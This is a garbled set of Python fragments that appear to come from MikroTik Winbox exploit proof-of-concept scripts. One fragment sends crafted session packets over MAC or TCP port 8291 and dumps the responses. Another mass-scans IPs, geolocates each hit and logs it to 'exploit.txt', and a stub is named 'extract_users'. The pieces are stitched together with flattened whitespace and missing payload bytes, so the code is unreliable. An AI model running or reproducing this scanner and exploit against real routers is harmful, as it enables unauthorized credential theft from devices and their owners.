def recv(self, minlen=None, contains=None): d = self.__buffer_pop__() while (minlen and len(d) < minlen) or (contains and contains not in d): d = self.__buffer_pop__() return d def close(self): self.work = False self.__send_end__() if __name__ == "__main__": if len(sys.argv) > 1: mac = binascii.unhexlify(sys.argv[1].replace(':', '')) m = MikrotikMACClient(mac) m.send(a) b[19] = m.recv(minlen=39)[38] # set correct session id m.send(b) dump(m.recv(contains=b"\x11\x00\x00\x21")) m.close() else: print("Usage: " + sys.argv[0] + " MAC_ADDRESS")
print(ip, ' ', end='') #print(d[55:]) r = requests.get( 'http://ip-api.com/json/' + ip + '?fields=country,regionName,city,lat,lon,isp,org,as,reverse' ) print(r.json()['country'], end='') file = open('exploit.txt', 'a') file.write("\n " + ip + " city:" + r.json()['country']) file.close() #print(r.json()['lat'],',',r.json()['lon']) #print(r.json()['isp']) #print(r.json()['org']) #print(r.json()['as']) #print(r.json()['reverse']) dump(result[55:]) except socket.timeout: print(singleIp, ": Connection Timeout") except ConnectionRefusedError: print(singleIp, ": Connection Refused") except ConnectionResetError: print(singleIp, ": Connection Reset") except IndexError: print(singleIp, ": Index Error") except socket.error: print(singleIp, ": Socket Error") except (KeyboardInterrupt, SystemExit): print("\n\t\033[31m[!] Close\033[0m")
if __name__ == "__main__": try: ip = sys.argv[1] except: print("Usage: python PoC.py [IP_ADDRESS]") #Initialize Socket s = socket.socket() s.settimeout(3) s.connect((ip, 8291)) #Convert to bytearray for manipulation a = bytearray(a) b = bytearray(b) #Send hello and recieve the sesison id s.send(a) d = bytearray(s.recv(1024)) #Replace the session id in template b[19] = d[38] #Send the edited response s.send(b) d = bytearray(s.recv(1024)) #Get results print(ip) dump(d[55:])
def extract_users(data): m.quit() dump(data)